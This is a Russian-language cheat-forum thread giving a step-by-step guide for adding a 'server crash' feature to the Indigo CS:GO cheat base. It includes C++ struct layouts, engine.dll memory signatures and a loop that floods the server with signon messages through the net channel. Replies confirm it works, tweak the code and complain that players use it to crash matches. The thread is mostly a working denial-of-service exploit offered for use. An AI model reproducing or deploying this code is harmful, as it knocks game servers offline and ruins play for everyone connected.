Гайд Краш сервера в индиго

Статус
В этой теме нельзя размещать новые ответы.
Пользователь
Статус
Оффлайн
Регистрация
3 Авг 2016
Сообщения
186
Реакции[?]
252
Поинты[?]
0
Пациент
Пожалуйста, авторизуйтесь для просмотра ссылки.


sdk.h
в конце файла добавляем
Код:
class INetChannel
{
public:
char pad_0000[20];           //0x0000
bool m_bProcessingMessages;  //0x0014
bool m_bShouldDelete;        //0x0015
char pad_0016[2];            //0x0016
int32_t m_nOutSequenceNr;    //0x0018 last send outgoing sequence number
int32_t m_nInSequenceNr;     //0x001C last received incoming sequnec number
int32_t m_nOutSequenceNrAck; //0x0020 last received acknowledge outgoing sequnce number
int32_t m_nOutReliableState; //0x0024 state of outgoing reliable data (0/1) flip flop used for loss detection
int32_t m_nInReliableState;  //0x0028 state of incoming reliable data
int32_t m_nChokedPackets;    //0x002C number of choked packets
char pad_0030[1044];         //0x0030
bool SendNetMsg(void* pSignonMsg, bool b1, bool b2)
{
return GetMethod<bool(__thiscall*)(INetChannel*, void*, bool, bool)>(this, 42)(this, pSignonMsg, b1, b2);
}
};
class CClientState
{
public:
void ForceFullUpdate()
{
}
char pad_0000[156];             //0x0000
INetChannel* m_NetChannel;          //0x009C
uint32_t m_nChallengeNr;        //0x00A0
char pad_00A4[100];             //0x00A4
uint32_t m_nSignonState;        //0x0108
char pad_010C[8];               //0x010C
float m_flNextCmdTime;          //0x0114
uint32_t m_nServerCount;        //0x0118
uint32_t m_nCurrentSequence;    //0x011C
char pad_0120[8];               //0x0120
uint32_t m_ClockDriftMgr; //0x0128
uint32_t m_nDeltaTick;          //0x0178
bool m_bPaused;                 //0x017C
char pad_017D[3];               //0x017D
uint32_t m_nViewEntity;         //0x0180
uint32_t m_nPlayerSlot;         //0x0184
char m_szLevelName[260];        //0x0188
char m_szLevelNameShort[40];    //0x028C
char m_szGroupName[40];         //0x02B4
char pad_02DC[56];              //0x02DC
uint32_t m_nMaxClients;         //0x0310
char pad_0314[18940];           //0x0314
};
settings.h
после
Код:
extern float hitmarkerAlpha;
добавляем
Код:
extern bool lag_enabled;
extern int lag_cycle_var;
settings.cpp
после
Код:
float hitmarkerAlpha;
добавляем
Код:
bool lag_enabled = false;
int lag_cycle_var = 0;
client.cpp
в меню где нибудь добавляем
Код:
ImGui::Checkbox("Lag", &Settings::Misc::lag_enabled);
ImGui::SameLine(SpaceLineOne);
ImGui::SliderInt("Lag Cycle Var", &Settings::Misc::lag_cycle_var, 0, 500);
ImGui::SameLine(SpaceLineOne);
===
после
Код:
if (IsLocalAlive()) { ... }
добавляем
Код:
if (Settings::Misc::lag_enabled) {
static auto NewSignonMsg = reinterpret_cast<void(__thiscall*)(void*, int, int)>(CSX::Memory::FindSignature("engine.dll", "NewSignonMsg", "55 8B EC 56 57 8B F9 8D 4F 04 C7 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? C6 ?? ?? ?? C7"));
static auto ClearSignonMsg = reinterpret_cast<void(__thiscall*)(void*)>(CSX::Memory::FindSignature("engine.dll", "ClearSignonMsg", "53 56 57 8B F9 8D ?? 38 C7 ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? 8B"));
static auto g_pClientState = **(CClientState***)(CSX::Memory::FindSignature("engine.dll", "CClientState", "A1 ? ? ? ? 8B 80 ? ? ? ? C3") + 1);
static INetChannel *netchan = *reinterpret_cast< INetChannel** >(reinterpret_cast< std::uintptr_t >(g_pClientState) + 0x9C);
void* pSignonMsg = malloc(76);
NewSignonMsg(pSignonMsg, 6, g_pClientState->m_nServerCount);
for (int i = 0; i < Settings::Misc::lag_cycle_var; i++) {
netchan->SendNetMsg(pSignonMsg, false, false);
}
ClearSignonMsg(pSignonMsg);
}
Теперь заходим на любой сервер, включаем в меню Lag, выкручиваем полоску и наслаждаемся
 
Последнее редактирование:
5 ночей на aim_ag_texture2
Эксперт
Статус
Оффлайн
Регистрация
6 Апр 2017
Сообщения
826
Реакции[?]
401
Поинты[?]
11K
static INetChannel *netchan можешь убрать из for (int и так далее ибо тебе нахуй не надо его делать 500 раз
 
Пользователь
Статус
Оффлайн
Регистрация
3 Авг 2016
Сообщения
186
Реакции[?]
252
Поинты[?]
0
5 ночей на aim_ag_texture2
Эксперт
Статус
Оффлайн
Регистрация
6 Апр 2017
Сообщения
826
Реакции[?]
401
Поинты[?]
11K
Новая ава блеять
Забаненный
Статус
Оффлайн
Регистрация
14 Янв 2018
Сообщения
89
Реакции[?]
235
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Понизь до 100=)
 
Я не Хлебушкин
Забаненный
Статус
Оффлайн
Регистрация
23 Июн 2017
Сообщения
571
Реакции[?]
213
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Да все,не понижай,заебал,щас во всех пастах выйдет обнова тупа бля у
 
nixware.cc
Эксперт
Статус
Оффлайн
Регистрация
1 Июл 2017
Сообщения
1,631
Реакции[?]
1,534
Поинты[?]
31K
Топ. Все работает.
Не вздумай понижать хайд, прошу, умоляю, не стоит этого делать :roflanPominki::roflanPominki:

 
Я не Хлебушкин
Забаненный
Статус
Оффлайн
Регистрация
23 Июн 2017
Сообщения
571
Реакции[?]
213
Поинты[?]
0
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Пользователь
Статус
Оффлайн
Регистрация
3 Авг 2016
Сообщения
186
Реакции[?]
252
Поинты[?]
0
Олдфаг
Статус
Оффлайн
Регистрация
5 Июл 2017
Сообщения
2,108
Реакции[?]
1,189
Поинты[?]
0
Лучше бы слил без хайда. А то каждая катка - рейджеры с крашем сервера, так может быть быстрее бы пофиксили. RIP Legit:roflanPominki:
 
Статус
В этой теме нельзя размещать новые ответы.
Похожие темы
Сверху Снизу